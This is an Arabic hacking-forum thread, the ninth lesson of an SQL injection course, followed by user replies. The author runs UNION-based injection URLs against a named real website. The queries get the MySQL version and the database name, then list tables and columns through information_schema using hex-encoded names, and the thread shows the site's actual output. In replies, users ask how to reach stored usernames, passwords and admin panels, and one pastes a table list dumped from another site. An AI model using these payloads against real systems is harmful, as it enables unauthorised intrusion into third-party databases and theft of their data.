دورة SQL injection , sql injection , دورة الحقن , شرح دورة الحقن , شرح sql injection , شرح دورة sql injection , الدرس التاسع من دورة sql injection الحقن ، دورة الحقن , شرح حقن القواعد ، استخراج بيانات الأعمده

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

درس اليوم تطبيق للدرس السابع! ، وفي هذا الدرس رح اقوم بإستخراج معلومات من قاعدة بيانات!

الدرس ثقيل شويّ وصعب على المبتدأين وعلى الاشخاص اللي ما تابعوا الدروس السابقه بحق ، على شان هيك شرحته كتابه + فيديو على السريع للتوضيح!

ملاحظة:- قبل استخدام ال information_schema يجب فحص اصدار قواعد البيانات للسيرفر ، لانه هذه الخدمه غير متوفره بالإصدارات القديمه مثل الإصدار الرابع
اذا طلع الإصدار هو الإصدار الخامس معناتوا بتقدر تطبق الطريقه
لإستخراج اصدار قواعد البيانات في السيرفر ننفذ الامر version()
راجع الدرس السادس! لانه ضروري

طيب...! ، خطوات العمل في الدرس

في هذا الدرس رح نستخرج جداول وحقول في احدى القواعد على احدى المواقع والخطوات ستكون كالتالي
1 - رح نفحص اذا الإصدار حق قواعد البيانات هو الإصدار الخامس ام لا >>> اذا طلع اقل من 5 معناتو الطريقة ما بتنفع على السيرفر ، ملاحظة: معظم السيرفرات ويمكن 90% منها تستعمل اصدار الخامس! :)
2 - رح نستخرج اسم قاعدة البيانات حتى نستخرج منها الجداول
3 - رح نستخرج الجداول ، ونختار احد الجداول ونستخرج الحقول اللي داخلها!

رح يكون تطبيقنا على هذا الموقع


http://english.katif.net/index.php?sub=-7+union+select+1,2,3,4,5,6,7,8--

طبعا تم شرح الدرس فيديو كمان حتى توضح الصوره! :)

طيب ظهر لدينا انه الاعمده المصابه في الموقع هي 3 و 4 و 5
طيب نجرب نستخرج اصدار قاعدة البيانات! عن طريق الامر version() ، يصير الرابط كالتالي

http://english.katif.net/index.php?sub=-7+union+select+1,2,version(),4,5,6,7,8--
رح يظهر لنا الإصدار ، والاصدار في هذا السيرفر هو 5.0.92-community
وهو الإصدار الخامس ويعني الطريقة شغاله على هذا الموقع!

طيب الحين نبي نستخرج اسم قاعدة البيانات في السيرفر ، نضع الامر هذا database() مكان احد الأعمده المصابه ، ويصبح الامر كالتالي


http://english.katif.net/index.php?sub=-7+union+select+1,2,database(),4,5,6,7,8--
رح يظهر لنا اسم قاعدة البيانات للموقع ، وطلع عندنا هذا
katif_main
طيب الحين نبي نسخرج جداول القاعدة
طيب الان نستخرج الجداول والامر كالتالي

http://english.katif.net/index.php?sub=-7+union+select+1,2,group_concat(table_name),4,5,6, 7,8+from+information_schema.tables--

طيب group_concat بعتقد لازم صرتوا تعرفوها! ، راجع الدرس السابق (الثامن)
طيب table_name وش تعني؟! ، اذا مو متذكر راجع الدرس السابع ورح تتذكر انه يوجد قاعدة اسمها information_schema وداخلها جدول اسمه tables وداخله يوجد عامود اسمه table_name
وهذا رابط الدرس
http://www.aljyyosh.com/vb/showthread.php?t=29707
طيب وش تعني from+information_schema.tables وهذه وضحت للامر وين موجود table_name اللي طلبنا إستخراجه وهو من القاعدة اللي اسمها information_schema ثم الجدول اللي داخلها اللي اسمه tables

طيب بالأمر اللي فوق طلع لنا اسماء الجداول ، طيب بس بالامر اللي فوق بطلع لنا كل اسماء الجداول لكل القواعد البيانات وبطلع معنا اسماء جداول قاعدة information_schema وهاي القاعدة جداولها كثيره وما بهمنا نستخرجهم كلهم ، على شان هيك بدنا نحدد يطلع الجداول لأي قاعدة :) ونحن نريده ان يطلع لنا الجداول حق القاعدة katif_main اللي استخرجنا في اول الشرح
رح نعدل على الامر ويصير هيك


http://english.katif.net/index.php?sub=-7+union+select+1,2,group_concat(table_name),4,5,6, 7,8+from+information_schema.tables+where+table_sch ema+like+0x6b617469665f6d61696e--

رح نوضح الامر! ، طبعا القسم الاول من الامر واضح ، اما القسم الثاني وهو
where+table_schema+like+0x6b617469665f6d61696e
في الدرس الاول شرحنا عن ال where ، وهين احنا عملنا شرط ، وقلنا له اسخرج اسماء الجداول من الجدول اللي اسمه tables الموجود في القاعدة information_schema عندما يكون table_schema يساوي 0x6b617469665f6d61696e
و table_schema وهي العامود اللي فيه اسم القاعدة حق الجدول
هذه 0x6b617469665f6d61696e تعني اسم القاعدة واللي هي katif_main ، بس احنى هون قمنا بتشفيرها
البعض يسأل كيف شفرتها! ، بقول له بسيطه جدا بإمكانك تشفيرها عن طريق برامج او عن طريق مواقع او عن طريق اداة خاصه ، بس انا رح اشفرها عن طريق احد المواقع
ندخل الى الموقع
http://www.waraxe.us/sql-char-encoder.html
وفي المربع الأول الكبير نكتب الكلمة الذي تريد تشفيرها وهي katif_main ومن ثم تضغط Encode Now!
بعدها سيظهر في المربع MySql hex-encoded string التشفير حق الكلمه

هيك صار واضح الامر ، طيب طلع عندنا اسم الجداول ، واحنى نختار جدول معيّن ، حتى نستخرج القواعد منه، نختار مثلا جدول واللي هو active_users

طيب نشفره في البداية عن طريق الموقع ، ثم نعدل الامر ، جرب في البداية عدله لوحدك واستخرج الاعمده اللي داخله ، واذا ما عرفت شوف الأمر التالي


http://english.katif.net/index.php?sub=-7+union+select+1,2,group_concat(column_name),4,5,6 ,7,8+from+information_schema.columns+where+table_n ame+like+0x6163746976655f7573657273--

شوف شو عدلنا في الامر ، فقط اشياء بسيطه

بما اننا بدنا نستخرج اسماء الاعمده اكيد رح نحدد انه يجيب من الجدول اللي اسمه columns اللي موجود داخل information_schema
واكيد اننا بدنا نحط column_name مكان العامود المصاب حتى نخبره انه يجيب لنا الاعمده مو الجداول ! ...
واكيد بدنا نعدل على الشرط اللي هو where+table_name+like من شان نحدد انه يستخرج عندما يكون اسم الجدول للأعمده يساوي 0x6163746976655f7573657273


والله عارف انكم مش فاهمين اشي! واللي نبر نبر :biggrin::tongue: ، على شان هيك عملت شرح فيديو على السريع! :)

تحميل الشرح من عدة سيرفرات

http://www.mirrorcreator.com/templates/mirror/images/hosts/ZShare.gif
http://www.zshare.net/download/98929310183a1c62/

او

http://www.mirrorcreator.com/templates/mirror/images/hosts/DepositFiles.gif

http://depositfiles.com/files/e87ko0i9m

او
http://www.mirrorcreator.com/templates/mirror/images/hosts/RapidShare.gif
https://www.rapidshare.com/files/303819753/aljyyosh_sql_injection_9.zip

او

http://www.mirrorcreator.com/templates/mirror/images/hosts/FileFactory.gif
http://www.filefactory.com/file/c2e8c53/n/aljyyosh_sql_injection_9.zip

او
http://www.mirrorcreator.com/templates/mirror/images/hosts/MediaFire.gif
http://www.mediafire.com/?uyenpu6w1z8rg0g

او
http://www.mirrorcreator.com/templates/mirror/images/hosts/MegaShare.gif
http://www.megashare.com/3875662

او
http://www.mirrorcreator.com/templates/mirror/images/hosts/Ziddu.gif
http://www.ziddu.com/download/18404849/aljyyosh_sql_injection_9.zip.html

او
http://www.mirrorcreator.com/templates/mirror/images/hosts/iFileIt.gif
http://ifile.it/yxiw4ev/aljyyosh_sql_injection_9.zip

او
http://www.mirrorcreator.com/templates/mirror/images/hosts/FileServe.gif
http://www.fileserve.com/file/DVw7sNw



وأذا في شيء غيّر واضح ارجوا تنبيهي حتى اضيفه للدرس :)

بالتوفيق للجميع

اخوكم ASDELY-ScOrPiOn من منتديات جيوش الهكرز و ASDELY.NET

شرف كبير أن أكون أول من يرد على أحد مواضيع المميزه
مشكوووووووووووور على الشرح ننتضرالمزيد من أبداعك رايتك بيضاء

شرف كبير أن أكون أول من يرد على أحد مواضيع المميزه
مشكوووووووووووور على الشرح ننتضرالمزيد من أبداعك رايتك بيضاء

هلا فيك حبيبي ومنور الموضوع

وأي استفسار انا موجود

بالتوفيق

يسلموووووووووووو شرح ما بعده أستفسار كله مفهووووووووووووم
بنسبه لهاذي الدوره الحمدلله مفهومه لانو في الجامعه درست ماده أسمها قواعد البيانات وهي سهله كثير وبكذا ساعدتني في فهم الموضوع
كــــــــــــــــــــــــ ــــــــــــلــــــــــــ ـــــــــــــــــــــــــ ك أبـــــــــــــــــــــــ ـــــــــــداع يا ASDELY-ScOrPiOn

موضوع سلسل وسهل بس ما كملت لين ما نجيب اليوزر والباس .. .؟

يسلموووووووووووو شرح ما بعده أستفسار كله مفهووووووووووووم
بنسبه لهاذي الدوره الحمدلله مفهومه لانو في الجامعه درست ماده أسمها قواعد البيانات وهي سهله كثير وبكذا ساعدتني في فهم الموضوع
كــــــــــــــــــــــــ ــــــــــــلــــــــــــ ـــــــــــــــــــــــــ ك أبـــــــــــــــــــــــ ـــــــــــداع يا ASDELY-ScOrPiOn

مشكووور على المرور العطر ، وقد سُرٍرتُ بان ما قدمته افادك في حياتك الشخصيه
تحياتي لك


موضوع سلسل وسهل بس ما كملت لين ما نجيب اليوزر والباس .. .؟
هلا فيك حبيبي ومنور الموضوع
انا في الشرح قمت بإستخراج بيانات من احدى الجداول بشكل سريع ، وبإمكانك التطبيق لكن استخراج بيانات من جدول اخر له علاقه باليوزرات والباسووردات! ، والدوره لم تنتهي بعد! ، سيكون المزيد من الدروس والشروحات.!
وانا هدفي هو ليس التطبيق او تنفيذ الاوامر كما رأيت مني! ، انا اطمح لتوصيل الفكره وتوضيح الخوارزميه الذي تعمل عليها ثغرات الحقن! مما سيكون لديّك مجال اوسع ومجال التطوير والإكتشاف فيها...!
بإذن الله سأشرح في الدروس القدامه كل خطوه بالتفصيل! ، وبالنهاية سنقوم بانشاء درس اخير والذي سيكون بمثابة تطبيق لكل ما تعلمناه!


بالتوفيق للجميع

مشكوووووووووووور على الشرح

مشكور على الشرح الوافي والمهم ......... في شرحك هناك ميزة وهي وصول الفكرة الى العضو
والله مبدع اخي الف شكر

مشكوووووووووووور على الشرح

هلا فيك حبيبي ومنور الموضوع
بالتوفيق.!


مشكور على الشرح الوافي والمهم ......... في شرحك هناك ميزة وهي وصول الفكرة الى العضو
والله مبدع اخي الف شكر
مشكوور حبيبي على المرور ومنور الموضوع بمرورك الجميل
تحياتي لك
بالتوفيق...!

اللهم اغفر للمسلمين والمسلمات والمؤمنين والمؤمنات الأحياء منهم والأموات
اللهــم إنـي أعـوذ بـك من نفحـة الكبـريـاء
اللهم لا تجعل الدنيا أكبر همــــنا
اللهم ارزق شباب المسلمين زوجات صالحات وارزق بناتهم أزواجا صالحين
اللهم باعد بيننا و بين الشبهات و الشهوات
اللهـــــــم فك قيد أسرى المسلميـن في كل مكان و دمر الكفار و الجبابرة و الطواغيت

وآآصصل يالمبدع ولآ تحرمنآ من جديدك ,,

الله يعطيك العافيه ،، تسلم اناااملك

طبقت نفس الشرح لكن لم يحدد لي عدد الأعمده المصااابه من الأمر order by او order+by

أي يعني يستمر في فتح الموقع ولا يخرج لدي في الصفحه خطا ،، لمعرفة عدد الأعمده

الأمر هو http://english.katif.net/index.php?sub=7+order+by+9--

وكذلك : http://english.katif.net/index.php?sub=7 order by 9--

وكذلك : */http://english.katif.net/index.php?sub=7 order by 9 (سلاش بالأول ومن ثم نجمه)

وكذلك : */http://english.katif.net/index.php?sub=7+order+by+9


هل بإمكانك إيضاح الأمر اكثر إذا بتسمح ؟؟!!


وشكرا مقدما ^_^

لأن راوابط الفيديو لاتعمل ^_^

والله أنت بطل عرفتك عندما قل نشفر الكلمة تستاهل 1000 لايك يا بطل

الله عليك الله عليك الله عليك


ربي يحفظك ياغالي

اللهم اغفر للمسلمين والمسلمات والمؤمنين والمؤمنات الأحياء منهم والأموات
اللهــم إنـي أعـوذ بـك من نفحـة الكبـريـاء
اللهم لا تجعل الدنيا أكبر همــــنا
اللهم ارزق شباب المسلمين زوجات صالحات وارزق بناتهم أزواجا صالحين
اللهم باعد بيننا و بين الشبهات و الشهوات
اللهـــــــم فك قيد أسرى المسلميـن في كل مكان و دمر الكفار و الجبابرة و الطواغيت

جزاك الله كل خير ياغالي

ووالله كل شيئ مفهوم وميسر بارك الله فيك أخي

مشكور يا غالي شرح وافي وكافي

والله ملكككككككككككككككككك

مشكوورر اخي على الطرح الرائع

الله يعطيك العافية واصل

كدة اتمينا كل الدروس فى دروس بعد الدرس ال9 ولا شو

مشكور أخوي على الشرح الوافي ما قصرت والله .. يعطيك العافية

مشكورر اخي الكريم جزاك الله كل خيررر

شرح جميل جميل محصلش الف شكر
وجارى تحميل الفيديو

يسلمؤؤؤؤؤؤ ..

السلام عليكم اخي وبارك الله فيك على الشرح

اخي وصلت لهون بس ماعرفت وين الاقي adm_users، هذا يلي طلع معي

_artigos,_categoriasartigos,_historia,_historiacat eg,_reportagens,ac_pages,ac_sabia_que,ads,ads_cate gories,ads_photosbyad,an_areas,an_user_areas,an_us ers,article,article_comments,frm_actions,frm_assoc iations,frm_dependencies,frm_fields,frm_fieldsopti ons,frm_files,frm_filesassoc,frm_forms,frm_formsac tions,frm_formsfields,frm_groups,frm_modu">_artigos,_categoriasartigos,_historia,_historiacat eg,_reportagens,ac_pages,ac_sabia_que,ads,ads_cate gories,ads_photosbyad,an_areas,an_user_areas,an_us ers,article,article_comments,frm_actions,frm_assoc iations,frm_dependencies,frm_fields,frm_fieldsopti ons,frm_files,frm_filesassoc,frm_forms,frm_formsac tions,frm_formsfields,frm_groups,frm_modu

:redface:مشكووووووووووووووور ولاه مبدع

- - - تم التحديث - - -

ممكن سءال في أحد الشروح على اليوتوب يكتب في أخر الرابط
char(37, 112, 97, 115, 73)
ماذ تعني ياأخي !!!!!!!!!!

:redface:مشكووووووووووووووور ولاه مبدع

COLOR="silver"]- - - تم التحديث - - -[/COLOR]

ممكن سءال في أحد الشروح على اليوتوب يكتب في أخر الرابط
char(37, 112, 97, 115, 73)
ماذ تعني ياأخي !!!!!!!!!!


هو مشفر بطريقة تانية بس
مثلا لوتريد تشفر user

بطريقة الاخ اسدلي تطلع هيك 0x75736572
بطريقة اللي شفتها باليوتوب تطلع هيك CHAR(37, 117, 115, 101, 114, 115, 37)
وان افضل الطريقة الاولى

بالتوفيق للجميع

- - - تم التحديث - - -


:redface:مشكووووووووووووووور ولاه مبدع

COLOR="silver"]- - - تم التحديث - - -[/COLOR]

ممكن سءال في أحد الشروح على اليوتوب يكتب في أخر الرابط
char(37, 112, 97, 115, 73)
ماذ تعني ياأخي !!!!!!!!!!


هو مشفر بطريقة تانية بس
مثلا لوتريد تشفر user

بطريقة الاخ اسدلي تطلع هيك 0x75736572
بطريقة اللي شفتها باليوتوب تطلع هيك CHAR(37, 117, 115, 101, 114, 115, 37)
وان افضل الطريقة الاولى

بالتوفيق للجميع

- - - تم التحديث - - -


:redface:مشكووووووووووووووور ولاه مبدع

COLOR="silver"]- - - تم التحديث - - -[/COLOR]

ممكن سءال في أحد الشروح على اليوتوب يكتب في أخر الرابط
char(37, 112, 97, 115, 73)
ماذ تعني ياأخي !!!!!!!!!!


هو مشفر بطريقة تانية بس
مثلا لوتريد تشفر user

بطريقة الاخ اسدلي تطلع هيك 0x75736572
بطريقة اللي شفتها باليوتوب تطلع هيك CHAR(37, 117, 115, 101, 114, 115, 37)
وان افضل الطريقة الاولى

بالتوفيق للجميع

السلام عليكم كيف الحال اخ اسدلي حبيت اطرح سؤال واذا بتقدر ارجو المساعدة
الحقيقة انا عرفت استغل ثغرات الاسيكول بالحقن اليدوي طبعا لكن عانيت من مشكلة
وهي عدم وايجاد مسار لوحة التحكم واستخدمت برنامج انتل تيمبر لكن الكل مشفر فيه
وانا مبتدئ بتفهم قصدي ياريت لو تقدم مساعده وشكرا

مشكوووووووووووووور يا غالي شرح ممتاز ^^

مشكوووووووووووور على الشرح

بارك الله فيك على الموضوع..

مشكووووووووووور اخي

SELECT command denied to user 'legroupec'@'10.0.95.15' for table 'tables' هذا ما يظهر لي ؟؟؟؟

السلم عليكم شو صار بالدورة ليش لهلئ في 9 دروس بس

السلام عليم كيف الحال ومشكور يا اخي ع التوضح
انا صممت وب سايت من فترة وحاب اجرب اخترق الوبسات تبعي واتبعت خطوات التغرة و اشتغلت بس الكود اللي يجلب الجداول لم يشتغل ومش عراف السبب


=28'+union+select+1,2,3table_name+from+information _schema.tables-- -
ارجو التوضيح
شكرا

- - - تم التحديث - - -

السلام عليم كيف الحال ومشكور يا اخي ع التوضح
انا صممت وب سايت من فترة وحاب اجرب اخترق الوبسات تبعي واتبعت خطوات التغرة و اشتغلت بس الكود اللي يجلب الجداول لم يشتغل ومش عراف السبب


=28'+union+select+1,2,3,table_name+from+informatio n_schema.tables-- -
ارجو التوضيح
شكرا

بارك الله فيك اخي + فهمنا بدون اللجوء الى الفيديو

شكرا على الموضوع